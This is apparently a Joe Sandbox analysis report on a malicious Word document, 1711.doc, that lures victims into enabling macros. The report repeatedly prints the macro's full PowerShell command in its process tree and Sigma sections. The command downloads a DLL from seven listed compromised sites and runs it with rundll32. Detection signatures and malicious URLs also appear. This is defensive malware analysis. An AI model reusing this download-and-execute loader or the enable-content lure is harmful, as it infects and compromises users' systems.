Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report 1711.doc

Overview

General Information

Sample Name:1711.doc
Analysis ID:526179
MD5:85ab297345c97bca1a5004dc537f6c1c
SHA1:0b609d0b86f1b29410451306c173c7fac013d5a7
SHA256:31daa06dc4c4f5dda5e557e8422d9b31655b1322e610bb42096a2a060727927d
Infos:

Most interesting Screenshot:

Detection

Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Multi AV Scanner detection for submitted file
Antivirus detection for URL or domain
Document contains an embedded VBA macro which may execute processes
Obfuscated command line found
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document exploit detected (process start blacklist hit)
Suspicious powershell command line found
Document contains no OLE stream with summary information
Queries the volume information (name, serial number etc) of a device
Yara signature match
Document has an unknown application name
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to detect virtual machines (SLDT)
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Sigma detected: Windows Suspicious Use Of Web Request in CommandLine
Creates a process in suspended mode (likely to inject code)
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Enables debug privileges

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 2640 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • cmd.exe (PID: 2632 cmdline: "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • powershell.exe (PID: 2840 cmdline: powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj MD5: 852D67A27E454BD389FA7F02A8CBE23F)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\~DFF0F57547FC904286.TMPSUSP_VBA_FileSystem_AccessDetects suspicious VBA that writes to disk and is activated on document openFlorian Roth
  • 0xa7c8:$s1: \Common Files\Microsoft Shared\
  • 0xab20:$s1: \Common Files\Microsoft Shared\
  • 0x3f5a:$s2: Scripting.FileSystemObject
  • 0x52a1:$a1: Document_Open
  • 0x9cb3:$a1: Document_Open
  • 0xb19d:$a1: Document_Open
  • 0xcac1:$a1: Document_Open

Sigma Overview

System Summary:

barindex
Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj, CommandLine: "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2640, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj, ProcessId: 2632
Sigma detected: Windows Suspicious Use Of Web Request in CommandLineShow sources
Source: Process startedAuthor: James Pemberton / @4A616D6573: Data: Command: "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj, CommandLine: "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2640, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj, ProcessId: 2632
Sigma detected: Non Interactive PowerShellShow sources
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj, CommandLine: powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2632, ProcessCommandLine: powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for submitted fileShow sources
Source: 1711.docVirustotal: Detection: 39%Perma Link
Source: 1711.docMetadefender: Detection: 20%Perma Link
Source: 1711.docReversingLabs: Detection: 57%
Antivirus detection for URL or domainShow sources
Source: http://itomsystem.in/i9eg3y/nNxmmn9aTcv/PAvira URL Cloud: Label: malware
Source: http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/Avira URL Cloud: Label: malware
Source: http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/Avira URL Cloud: Label: malware
Source: https://staviancjs.com/wp-forum/QOm4n2/Avira URL Cloud: Label: malware
Source: http://itomsystem.in/i9eg3y/nNxmmn9aTcv/Avira URL Cloud: Label: malware
Source: http://itomsystem.in/i9eg3y/nNxmmn9aTcv/PEAvira URL Cloud: Label: malware
Source: http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/Avira URL Cloud: Label: malware
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.427339359.0000000002A67000.00000004.00000040.sdmp
Source: Binary string: System.Management.Automation.pdbBB source: powershell.exe, 00000004.00000002.427339359.0000000002A67000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb=C:\ source: powershell.exe, 00000004.00000002.427339359.0000000002A67000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbamDa source: powershell.exe, 00000004.00000002.427339359.0000000002A67000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb:\Pr source: powershell.exe, 00000004.00000002.427339359.0000000002A67000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.427339359.0000000002A67000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.427339359.0000000002A67000.00000004.00000040.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior

Software Vulnerabilities:

barindex
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe
Source: powershell.exe, 00000004.00000002.430534978.0000000003AB5000.00000004.00000001.sdmp, powershell.exe, 00000004.00000002.429788258.0000000003607000.00000004.00000001.sdmpString found in binary or memory: http://alfadandoinc.com/67oyp/C2J2KyCpQn
Source: powershell.exe, 00000004.00000002.429788258.0000000003607000.00000004.00000001.sdmpString found in binary or memory: http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/
Source: powershell.exe, 00000004.00000002.429788258.0000000003607000.00000004.00000001.sdmpString found in binary or memory: http://alfadandoinc.com/67oyp/C2h
Source: powershell.exe, 00000004.00000002.429788258.0000000003607000.00000004.00000001.sdmpString found in binary or memory: http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/
Source: powershell.exe, 00000004.00000002.427979783.000000000320B000.00000004.00000001.sdmpString found in binary or memory: http://itomsystem.in/i9eg3y/nN
Source: powershell.exe, 00000004.00000002.429788258.0000000003607000.00000004.00000001.sdmpString found in binary or memory: http://itomsystem.in/i9eg3y/nNxmmn9aTcv/
Source: powershell.exe, 00000004.00000002.427629821.0000000002E7C000.00000004.00000001.sdmpString found in binary or memory: http://itomsystem.in/i9eg3y/nNxmmn9aTcv/P
Source: powershell.exe, 00000004.00000002.429788258.0000000003607000.00000004.00000001.sdmpString found in binary or memory: http://itomsystem.in/i9eg3y/nNxmmn9aTcv/PE
Source: powershell.exe, 00000004.00000002.426788462.0000000002230000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: powershell.exe, 00000004.00000002.429788258.0000000003607000.00000004.00000001.sdmpString found in binary or memory: http://thepilatesstudionj.com/wp
Source: powershell.exe, 00000004.00000002.427979783.000000000320B000.00000004.00000001.sdmpString found in binary or memory: http://thepilatesstudionj.com/wp-content/oAx5UoQm
Source: powershell.exe, 00000004.00000002.429788258.0000000003607000.00000004.00000001.sdmpString found in binary or memory: http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/
Source: powershell.exe, 00000004.00000002.426788462.0000000002230000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
Source: powershell.exe, 00000004.00000002.427979783.000000000320B000.00000004.00000001.sdmpString found in binary or memory: http://www.caboturnup.c
Source: powershell.exe, 00000004.00000002.427979783.000000000320B000.00000004.00000001.sdmpString found in binary or memory: http://www.caboturnup.com/wp-content/p
Source: powershell.exe, 00000004.00000002.427876322.000000000311C000.00000004.00000001.sdmpString found in binary or memory: http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZg
Source: powershell.exe, 00000004.00000002.429788258.0000000003607000.00000004.00000001.sdmpString found in binary or memory: http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/
Source: powershell.exe, 00000004.00000002.427979783.000000000320B000.00000004.00000001.sdmp, powershell.exe, 00000004.00000002.429788258.0000000003607000.00000004.00000001.sdmpString found in binary or memory: https://staviancjs.co
Source: powershell.exe, 00000004.00000002.427979783.000000000320B000.00000004.00000001.sdmpString found in binary or memory: https://staviancjs.com/wp-forum/QOm4
Source: powershell.exe, 00000004.00000002.429788258.0000000003607000.00000004.00000001.sdmpString found in binary or memory: https://staviancjs.com/wp-forum/QOm4n2/
Source: powershell.exe, 00000004.00000002.427979783.000000000320B000.00000004.00000001.sdmpString found in binary or memory: https://yougandan.com/backup
Source: powershell.exe, 00000004.00000002.427979783.000000000320B000.00000004.00000001.sdmpString found in binary or memory: https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNc
Source: powershell.exe, 00000004.00000002.429788258.0000000003607000.00000004.00000001.sdmpString found in binary or memory: https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{52852A70-A935-4D7F-A270-7FCD1CA48619}.tmpJump to behavior

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Screenshot number: 4Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 0 Page: I of I Words:
Source: Screenshot number: 4Screenshot OCR: DOCUMENT IS PROTECTED. i Previewing is not available for protected documents. You have to press "E
Source: Screenshot number: 4Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Screenshot number: 4Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 0 Page: I of I Words: 0 N@m 13 ;a 10096 G)
Source: Screenshot number: 8Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. Ci 1_| O I I a O I
Source: Screenshot number: 8Screenshot OCR: DOCUMENT IS PROTECTED. U Previewing is not available for protected documents. m You have to pres
Source: Screenshot number: 8Screenshot OCR: protected documents. m You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview
Source: Screenshot number: 8Screenshot OCR: ENABLE CONTENT" buttons to preview this document. Ci 1_| O I I a O I @ 100% G) A GE)
Source: Document image extraction number: 0Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 0Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 0Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 0Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Screenshot number: 12Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. ii: ^ a S O I @
Source: Screenshot number: 12Screenshot OCR: ENABLE CONTENT" buttons to preview this document. ii: ^ a S O I @ 100% G) A GE)
Document contains an embedded VBA macro which may execute processesShow sources
Source: VBA code instrumentationOLE, VBA macro: Module bvkaeiku2ncoi2uho3ihdes, Function dgfjalfhkaugwikgfuol3wgnacoi3u5taboi3ut5roai3u5go3wugaolisdrgfso8i7wejwdoljgf, API IWshShell3.Run("cmd.exe /c start /B powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj",0:Integer)Name: dgfjalfhkaugwikgfuol3wgnacoi3u5taboi3ut5roai3u5go3wugaolisdrgfso8i7wejwdoljgf
Source: ~DFF0F57547FC904286.TMP.0.drOLE, VBA macro line: JbxHook_Run_2__ob = jbxthis.Run(jbxparam0, jbxparam1)
Source: 1711.docOLE indicator has summary info: false
Source: ~WRF{E3844549-3F78-457B-BAEF-06FBD2156752}.tmp.0.drOLE indicator has summary info: false
Source: ~DFF0F57547FC904286.TMP.0.drOLE indicator has summary info: false
Source: C:\Users\user\AppData\Local\Temp\~DFF0F57547FC904286.TMP, type: DROPPEDMatched rule: SUSP_VBA_FileSystem_Access date = 2019-06-21, author = Florian Roth, description = Detects suspicious VBA that writes to disk and is activated on document open, reference = Internal Research, score = 52262bb315fa55b7441a04966e176b0e26b7071376797e35c80aa60696b6d6fc
Source: 1711.docOLE indicator application name: unknown
Source: ~WRF{E3844549-3F78-457B-BAEF-06FBD2156752}.tmp.0.drOLE indicator application name: unknown
Source: ~DFF0F57547FC904286.TMP.0.drOLE indicator application name: unknown
Source: 1711.docOLE, VBA macro line: Private Sub Document_Open()
Source: VBA code instrumentationOLE, VBA macro: Module bvkaeiku2ncoi2uho3ihdes, Function Document_OpenName: Document_Open
Source: ~DFF0F57547FC904286.TMP.0.drOLE, VBA macro line: Private Function JbxHook_Open_3__ob_set(jbxline, ByRef jbxthis, ByRef jbxparam0, ByRef jbxparam1, ByRef jbxparam2)
Source: ~DFF0F57547FC904286.TMP.0.drOLE, VBA macro line: Static jbxtresh_Open As Integer
Source: ~DFF0F57547FC904286.TMP.0.drOLE, VBA macro line: If jbxtresh_Open < 200 Then
Source: ~DFF0F57547FC904286.TMP.0.drOLE, VBA macro line: Set JbxHook_Open_3__ob_set = jbxthis.Open(jbxparam0, jbxparam1, jbxparam2)
Source: ~DFF0F57547FC904286.TMP.0.drOLE, VBA macro line: If jbxtresh_Open < 200 Then
Source: ~DFF0F57547FC904286.TMP.0.drOLE, VBA macro line: jbxtresh_Open = jbxtresh_Open + 1
Source: ~DFF0F57547FC904286.TMP.0.drOLE, VBA macro line: JbxLogParam "jbxreturn", JbxHook_Open_3__ob_set
Source: ~DFF0F57547FC904286.TMP.0.drOLE, VBA macro line: Set WB = JbxHook_Open_3__ob_set(28, Workbooks, FileName, False, True)
Source: ~DFF0F57547FC904286.TMP.0.drOLE, VBA macro line: Private Sub Document_Open()
Source: 1711.docOLE indicator, VBA macros: true
Source: ~DFF0F57547FC904286.TMP.0.drOLE indicator, VBA macros: true
Source: ~WRF{E3844549-3F78-457B-BAEF-06FBD2156752}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~DFF0F57547FC904286.TMP.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: 1711.docVirustotal: Detection: 39%
Source: 1711.docMetadefender: Detection: 20%
Source: 1711.docReversingLabs: Detection: 57%
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..................l.....#.........................l.....................`I.........v.....................K......................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....#................Hxk....................................}..v....8.......0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../................Ixk......M.............................}..v............0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../................Hxk....................................}..v....8.......0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;................Ixk......M.............................}..v............0.......................~.......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;................Hxk....X...............................}..v............0.................M.............................Jump to behavior
